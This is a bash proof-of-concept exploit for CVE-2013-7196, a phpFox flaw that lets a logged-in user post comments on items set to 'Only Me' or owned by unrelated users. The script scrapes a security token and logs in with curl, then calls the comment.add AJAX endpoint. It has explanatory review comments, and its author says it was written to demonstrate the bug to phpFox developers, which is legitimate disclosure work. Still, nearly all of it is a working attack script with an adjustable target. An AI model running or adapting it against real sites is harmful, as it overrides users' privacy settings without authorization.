CVE-2013-7196.bash
#!/bin/bash
# Proof of concept for CVE-2013-7196 (phpFox comment privacy bypass).
#
# This script was developed to demonstrate the problem to the phpFox
# development team; it can be adapted for testing other applications
# that use the framework simply by adjusting the variable "${TARGET}".
#
# Comments are published with the credentials defined in the variables
#
# USERACCOUNT = "your_mail%40example.com"
# USERPASSWD = "your_password"
#
# Even when there is no relationship between the users, or the
# publication is set to "Only Me" (the case that is the focus of this
# study), the comment will still be added.
#
# Wesley Henrique Leite
# wesleyhenrique **(A)** gmail **NOSPAM** com
# wesley **(A)** telapreta **NOSPAM** com **NOSPAM** br
#
# USAGE:
# $ CVE-2013-7196.bash <user_status|photo|music_song|poll|link|blog> 777 'Hello all'
#
# Flow of the script:
#   1. GET the landing page to obtain a cookie and the security_token.
#   2. POST the login form with that token and cookie.
#   3. POST comment.add to the AJAX endpoint with the same cookie/token.
# Every curl response body is written to stdout unchanged and no
# response is inspected, so success or failure is only visible to a
# human reading the output.
#
#AUTH
# encode
# @ = %40 -> teste%40example.com
USERACCOUNT=""          # account e-mail, already URL-encoded (see note above)
USERPASSWD=""           # account password; interpolated verbatim into the login POST body
COOKIE=cookie.txt       # cookie jar, relative to the current working directory; truncated below
SECTOKEN=""             # security_token scraped from the landing page (filled in below)
TYPE="$1"               # phpFox item type, one of the values listed in USAGE
ITEM_ID=$2              # numeric id of the item to comment on (note: expansion is unquoted)
MSG="$3"                # comment text; placed into the POST body exactly as given
TARGET="http://demo.phpfox.com"   # base URL of the instance under test (per the header, the only thing to adjust)
URL_LOGIN="${TARGET}/user/login"
URL_AJAX="${TARGET}/static/ajax.php"
USER_AGENT="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
USAGE="Type Item_id and MSG is required\n $0 <user_status|photo|music_song|poll|link|blog> 777 'Hello all' "
# Refuse to run until both credentials have been filled in above.
# NOTE(review): "-o"/"-a" inside [ ] are the deprecated test operators;
# behaviour is kept as the author wrote it.
[ -z "${USERACCOUNT}" -o \
-z "${USERPASSWD}" ] && {
echo "Open $0 file and edit USERACCOUNT and USERPASSWD"
exit
}
# Exactly three non-empty positional arguments are required.
[ $# -eq 3 -a \
! -z "${TYPE}" -a \
! -z "${ITEM_ID}" -a \
! -z "${MSG}" ] || { echo -e "${USAGE}" ; exit ; }
# Create/truncate the cookie file before the first request.
>${COOKIE}
# GET COOKIE AND SECURITY_TOKEN
# -D saves the response headers (Set-Cookie) to COOKIE; the body is
# searched for the 32-hex-character security_token.  sort -u collapses
# repeated occurrences; if nothing matches, SECTOKEN stays empty and the
# later POSTs are sent with an empty token.
SECTOKEN=$(curl -D ${COOKIE} ${TARGET} |
grep 'security_token' |
grep -Ewo '([a-f0-9A-F]){32}' |
sort -u)
# AUTH USER
# SAVE COOKIE
# Sends the cookie from step 1 (-b) and overwrites COOKIE with the
# post-login response headers (-D), i.e. the authenticated session cookie.
# NOTE(review): the password is passed on the curl command line, so it is
# visible in the process list and shell history of the machine running this.
curl "${URL_LOGIN}" \
-b "${COOKIE}" \
-H "Origin: ${TARGET}" \
-H 'Accept-Encoding: gzip,deflate,sdch' \
-H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.6,en;q=0.4' \
-H "${USER_AGENT}" \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
-H 'Cache-Control: max-age=0' \
-H 'Connection: keep-alive' \
-D ${COOKIE} \
--data "core%5Bsecurity_token%5D=${SECTOKEN}&val%5Blogin%5D=${USERACCOUNT}&val%5Bremember_me%5D=&val%5Bpassword%5D=${USERPASSWD}" \
--compressed
### COMMENT ADD
# The request that exercises the reported issue: core[call]=comment.add
# on the AJAX endpoint, authenticated only by the session cookie and the
# security_token.  val[parent_id]=0 makes it a top-level comment and
# val[is_via_feed] reuses ITEM_ID; core[profile_user_id]=290 and
# core[is_user_profile]=1 are hard-coded by the author, presumably for
# the demo instance this was written against.  On the server side this
# shows up as a POST to /static/ajax.php, which is where the privacy /
# relationship check for the target item would be expected to apply.
curl "${URL_AJAX}" \
-b "${COOKIE}" \
-H "Origin: ${TARGET}" \
-H "${USER_AGENT}" \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Connection: keep-alive' \
--data "&core[ajax]=true&core[call]=comment.add&core[security_token]=${SECTOKEN}&val[type]=${TYPE}&val[item_id]=${ITEM_ID}&val[parent_id]=0&val[is_via_feed]=${ITEM_ID}&val[default_feed_value]=Write%20a%20comment...&val[text]=${MSG}&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290" \
--compressed